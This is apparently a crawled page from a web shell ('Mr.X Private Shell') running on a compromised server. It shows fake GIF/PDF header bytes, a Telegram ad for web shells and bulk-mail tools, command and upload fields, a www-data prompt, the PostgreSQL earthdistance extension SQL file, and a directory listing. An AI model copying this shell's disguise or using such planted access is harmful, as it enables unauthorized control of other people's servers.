GIF89; GIF89; %PDF- %PDF- Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.129: ~ $
/* contrib/earthdistance/earthdistance--1.1.sql */

-- complain if script is sourced in psql, rather than via CREATE EXTENSION
\echo Use "CREATE EXTENSION earthdistance" to load this file. \quit

-- earth() returns the radius of the earth in meters. This is the only
-- place you need to change things for the cube base distance functions
-- in order to use different units (or a better value for the Earth's radius).

CREATE FUNCTION earth() RETURNS float8
LANGUAGE SQL IMMUTABLE PARALLEL SAFE
AS 'SELECT ''6378168''::float8';

-- Astronomers may want to change the earth function so that distances will be
-- returned in degrees. To do this comment out the above definition and
-- uncomment the one below. Note that doing this will break the regression
-- tests.
--
-- CREATE FUNCTION earth() RETURNS float8
-- LANGUAGE SQL IMMUTABLE
-- AS 'SELECT 180/pi()';

-- Define domain for locations on the surface of the earth using a cube
-- datatype with constraints. cube provides 3D indexing.
-- The cube is restricted to be a point, no more than 3 dimensions
-- (for less than 3 dimensions 0 is assumed for the missing coordinates)
-- and that the point must be very near the surface of the sphere
-- centered about the origin with the radius of the earth.

CREATE DOMAIN earth AS cube
  CONSTRAINT not_point check(cube_is_point(value))
  CONSTRAINT not_3d check(cube_dim(value) <= 3)
  CONSTRAINT on_surface check(abs(cube_distance(value, '(0)'::cube) /
  earth() - '1'::float8) < '10e-7'::float8);

CREATE FUNCTION sec_to_gc(float8)
RETURNS float8
LANGUAGE SQL
IMMUTABLE STRICT
PARALLEL SAFE
AS 'SELECT CASE WHEN $1 < 0 THEN 0::float8 WHEN $1/(2*earth()) > 1 THEN pi()*earth() ELSE 2*earth()*asin($1/(2*earth())) END';

CREATE FUNCTION gc_to_sec(float8)
RETURNS float8
LANGUAGE SQL
IMMUTABLE STRICT
PARALLEL SAFE
AS 'SELECT CASE WHEN $1 < 0 THEN 0::float8 WHEN $1/earth() > pi() THEN 2*earth() ELSE 2*earth()*sin($1/(2*earth())) END';

CREATE FUNCTION ll_to_earth(float8, float8)
RETURNS earth
LANGUAGE SQL
IMMUTABLE STRICT
PARALLEL SAFE
AS 'SELECT cube(cube(cube(earth()*cos(radians($1))*cos(radians($2))),earth()*cos(radians($1))*sin(radians($2))),earth()*sin(radians($1)))::earth';

CREATE FUNCTION latitude(earth)
RETURNS float8
LANGUAGE SQL
IMMUTABLE STRICT
PARALLEL SAFE
AS 'SELECT CASE WHEN cube_ll_coord($1, 3)/earth() < -1 THEN -90::float8 WHEN cube_ll_coord($1, 3)/earth() > 1 THEN 90::float8 ELSE degrees(asin(cube_ll_coord($1, 3)/earth())) END';

CREATE FUNCTION longitude(earth)
RETURNS float8
LANGUAGE SQL
IMMUTABLE STRICT
PARALLEL SAFE
AS 'SELECT degrees(atan2(cube_ll_coord($1, 2), cube_ll_coord($1, 1)))';

CREATE FUNCTION earth_distance(earth, earth)
RETURNS float8
LANGUAGE SQL
IMMUTABLE STRICT
PARALLEL SAFE
AS 'SELECT sec_to_gc(cube_distance($1, $2))';

CREATE FUNCTION earth_box(earth, float8)
RETURNS cube
LANGUAGE SQL
IMMUTABLE STRICT
PARALLEL SAFE
AS 'SELECT cube_enlarge($1, gc_to_sec($2), 3)';

--------------- geo_distance

CREATE FUNCTION geo_distance (point, point)
RETURNS float8
LANGUAGE C IMMUTABLE STRICT PARALLEL SAFE AS 'MODULE_PATHNAME';

--------------- geo_distance as operator <@>

CREATE OPERATOR <@> (
  LEFTARG = point,
  RIGHTARG = point,
  PROCEDURE = geo_distance,
  COMMUTATOR = <@>
);

Filemanager

Name Type Size Permission Actions
adminpack--1.0--1.1.sql File 274 B 0644
adminpack--1.0.sql File 1.5 KB 0644
adminpack--1.1--2.0.sql File 1.64 KB 0644
adminpack--2.0--2.1.sql File 595 B 0644
adminpack.control File 176 B 0644
amcheck--1.0--1.1.sql File 931 B 0644
amcheck--1.0.sql File 704 B 0644
amcheck--1.1--1.2.sql File 705 B 0644
amcheck--1.2--1.3.sql File 852 B 0644
amcheck.control File 154 B 0644
autoinc--1.0.sql File 249 B 0644
autoinc.control File 149 B 0644
bloom--1.0.sql File 666 B 0644
bloom.control File 156 B 0644
btree_gin--1.0--1.1.sql File 1.34 KB 0644
btree_gin--1.0.sql File 24.24 KB 0644
btree_gin--1.1--1.2.sql File 1.41 KB 0644
btree_gin--1.2--1.3.sql File 4.46 KB 0644
btree_gin.control File 175 B 0644
btree_gist--1.0--1.1.sql File 3.65 KB 0644
btree_gist--1.1--1.2.sql File 4.93 KB 0644
btree_gist--1.2--1.3.sql File 1.91 KB 0644
btree_gist--1.2.sql File 40.15 KB 0644
btree_gist--1.3--1.4.sql File 1.89 KB 0644
btree_gist--1.4--1.5.sql File 1.83 KB 0644
btree_gist--1.5--1.6.sql File 13.1 KB 0644
btree_gist.control File 178 B 0644
citext--1.0--1.1.sql File 1 KB 0644
citext--1.1--1.2.sql File 3.34 KB 0644
citext--1.2--1.3.sql File 850 B 0644
citext--1.3--1.4.sql File 668 B 0644
citext--1.4--1.5.sql File 2.23 KB 0644
citext--1.4.sql File 13.15 KB 0644
citext--1.5--1.6.sql File 427 B 0644
citext.control File 173 B 0644
cube--1.0--1.1.sql File 1.56 KB 0644
cube--1.1--1.2.sql File 3.73 KB 0644
cube--1.2--1.3.sql File 365 B 0644
cube--1.2.sql File 9.53 KB 0644
cube--1.3--1.4.sql File 2.33 KB 0644
cube--1.4--1.5.sql File 591 B 0644
cube.control File 157 B 0644
dblink--1.0--1.1.sql File 419 B 0644
dblink--1.1--1.2.sql File 2.77 KB 0644
dblink--1.2.sql File 6.49 KB 0644
dblink.control File 170 B 0644
dict_int--1.0.sql File 711 B 0644
dict_int.control File 173 B 0644
dict_xsyn--1.0.sql File 694 B 0644
dict_xsyn.control File 179 B 0644
earthdistance--1.0--1.1.sql File 671 B 0644
earthdistance--1.1.sql File 3.16 KB 0644
earthdistance.control File 202 B 0644
file_fdw--1.0.sql File 475 B 0644
file_fdw.control File 155 B 0644
fuzzystrmatch--1.0--1.1.sql File 788 B 0644
fuzzystrmatch--1.1.sql File 1.54 KB 0644
fuzzystrmatch.control File 190 B 0644
hstore--1.1--1.2.sql File 1.6 KB 0644
hstore--1.2--1.3.sql File 525 B 0644
hstore--1.3--1.4.sql File 5.19 KB 0644
hstore--1.4--1.5.sql File 409 B 0644
hstore--1.4.sql File 13.44 KB 0644
hstore--1.5--1.6.sql File 455 B 0644
hstore--1.6--1.7.sql File 1.04 KB 0644
hstore--1.7--1.8.sql File 508 B 0644
hstore.control File 173 B 0644
insert_username--1.0.sql File 273 B 0644
insert_username.control File 170 B 0644
intagg--1.0--1.1.sql File 897 B 0644
intagg--1.1.sql File 1.06 KB 0644
intagg.control File 119 B 0644
intarray--1.0--1.1.sql File 1.75 KB 0644
intarray--1.1--1.2.sql File 5.4 KB 0644
intarray--1.2--1.3.sql File 663 B 0644
intarray--1.2.sql File 12 KB 0644
intarray--1.3--1.4.sql File 692 B 0644
intarray--1.4--1.5.sql File 282 B 0644
intarray.control File 191 B 0644
isn--1.0--1.1.sql File 12.04 KB 0644
isn--1.1--1.2.sql File 5.14 KB 0644
isn--1.1.sql File 68.25 KB 0644
isn.control File 175 B 0644
lo--1.0--1.1.sql File 223 B 0644
lo--1.1.sql File 722 B 0644
lo.control File 141 B 0644
ltree--1.0--1.1.sql File 6.19 KB 0644
ltree--1.1--1.2.sql File 5.09 KB 0644
ltree--1.1.sql File 18.92 KB 0644
ltree.control File 170 B 0644
moddatetime--1.0.sql File 261 B 0644
moddatetime.control File 165 B 0644
old_snapshot--1.0.sql File 549 B 0644
old_snapshot.control File 168 B 0644
pageinspect--1.0--1.1.sql File 560 B 0644
pageinspect--1.1--1.2.sql File 562 B 0644
pageinspect--1.2--1.3.sql File 1.9 KB 0644
pageinspect--1.3--1.4.sql File 2.51 KB 0644
pageinspect--1.4--1.5.sql File 1.32 KB 0644
pageinspect--1.5--1.6.sql File 2.2 KB 0644
pageinspect--1.5.sql File 6.12 KB 0644
pageinspect--1.6--1.7.sql File 698 B 0644
pageinspect--1.7--1.8.sql File 1.67 KB 0644
pageinspect--1.8--1.9.sql File 3.32 KB 0644
pageinspect.control File 173 B 0644
pg_buffercache--1.0--1.1.sql File 508 B 0644
pg_buffercache--1.1--1.2.sql File 271 B 0644
pg_buffercache--1.2--1.3.sql File 328 B 0644
pg_buffercache--1.2.sql File 794 B 0644
pg_buffercache.control File 157 B 0644
pg_freespacemap--1.0--1.1.sql File 335 B 0644
pg_freespacemap--1.1--1.2.sql File 377 B 0644
pg_freespacemap--1.1.sql File 899 B 0644
pg_freespacemap.control File 160 B 0644
pg_prewarm--1.0--1.1.sql File 281 B 0644
pg_prewarm--1.1--1.2.sql File 458 B 0644
pg_prewarm--1.1.sql File 475 B 0644
pg_prewarm.control File 139 B 0644
pg_stat_statements--1.0--1.1.sql File 1.22 KB 0644
pg_stat_statements--1.1--1.2.sql File 1.3 KB 0644
pg_stat_statements--1.2--1.3.sql File 1.42 KB 0644
pg_stat_statements--1.3--1.4.sql File 345 B 0644
pg_stat_statements--1.4--1.5.sql File 305 B 0644
pg_stat_statements--1.4.sql File 1.39 KB 0644
pg_stat_statements--1.5--1.6.sql File 376 B 0644
pg_stat_statements--1.6--1.7.sql File 806 B 0644
pg_stat_statements--1.7--1.8.sql File 1.7 KB 0644
pg_stat_statements--1.8--1.9.sql File 2.08 KB 0644
pg_stat_statements.control File 204 B 0644
pg_surgery--1.0.sql File 608 B 0644
pg_surgery.control File 168 B 0644
pg_trgm--1.0--1.1.sql File 536 B 0644
pg_trgm--1.1--1.2.sql File 2.14 KB 0644
pg_trgm--1.2--1.3.sql File 3.42 KB 0644
pg_trgm--1.3--1.4.sql File 2 KB 0644
pg_trgm--1.3.sql File 7.76 KB 0644
pg_trgm--1.4--1.5.sql File 858 B 0644
pg_trgm--1.5--1.6.sql File 418 B 0644
pg_trgm.control File 192 B 0644
pg_visibility--1.0--1.1.sql File 883 B 0644
pg_visibility--1.1--1.2.sql File 833 B 0644
pg_visibility--1.1.sql File 2.76 KB 0644
pg_visibility.control File 186 B 0644
pgcrypto--1.0--1.1.sql File 307 B 0644
pgcrypto--1.1--1.2.sql File 483 B 0644
pgcrypto--1.2--1.3.sql File 2.29 KB 0644
pgcrypto--1.3.sql File 5.57 KB 0644
pgcrypto.control File 152 B 0644
pgrowlocks--1.0--1.1.sql File 651 B 0644
pgrowlocks--1.1--1.2.sql File 253 B 0644
pgrowlocks--1.2.sql File 555 B 0644
pgrowlocks.control File 152 B 0644
pgstattuple--1.0--1.1.sql File 400 B 0644
pgstattuple--1.1--1.2.sql File 1.4 KB 0644
pgstattuple--1.2--1.3.sql File 1.1 KB 0644
pgstattuple--1.3--1.4.sql File 623 B 0644
pgstattuple--1.4--1.5.sql File 5.38 KB 0644
pgstattuple--1.4.sql File 3.68 KB 0644
pgstattuple.control File 147 B 0644
plpgsql--1.0.sql File 658 B 0644
plpgsql.control File 193 B 0644
postgres_fdw--1.0--1.1.sql File 626 B 0644
postgres_fdw--1.0.sql File 507 B 0644
postgres_fdw.control File 172 B 0644
refint--1.0.sql File 343 B 0644
refint.control File 169 B 0644
seg--1.0--1.1.sql File 2.93 KB 0644
seg--1.1--1.2.sql File 360 B 0644
seg--1.1.sql File 7.95 KB 0644
seg--1.2--1.3.sql File 2.29 KB 0644
seg--1.3--1.4.sql File 259 B 0644
seg.control File 187 B 0644
sslinfo--1.0--1.1.sql File 375 B 0644
sslinfo--1.1--1.2.sql File 746 B 0644
sslinfo--1.2.sql File 1.5 KB 0644
sslinfo.control File 146 B 0644
tablefunc--1.0.sql File 2.1 KB 0644
tablefunc.control File 189 B 0644
tcn--1.0.sql File 274 B 0644
tcn.control File 149 B 0644
tsm_system_rows--1.0.sql File 327 B 0644
tsm_system_rows.control File 201 B 0644
tsm_system_time--1.0.sql File 327 B 0644
tsm_system_time.control File 207 B 0644
unaccent--1.0--1.1.sql File 445 B 0644
unaccent--1.1.sql File 910 B 0644
unaccent.control File 172 B 0644
uuid-ossp--1.0--1.1.sql File 688 B 0644
uuid-ossp--1.1.sql File 1.48 KB 0644
uuid-ossp.control File 178 B 0644
xml2--1.0--1.1.sql File 944 B 0644
xml2--1.1.sql File 2 KB 0644
xml2.control File 182 B 0644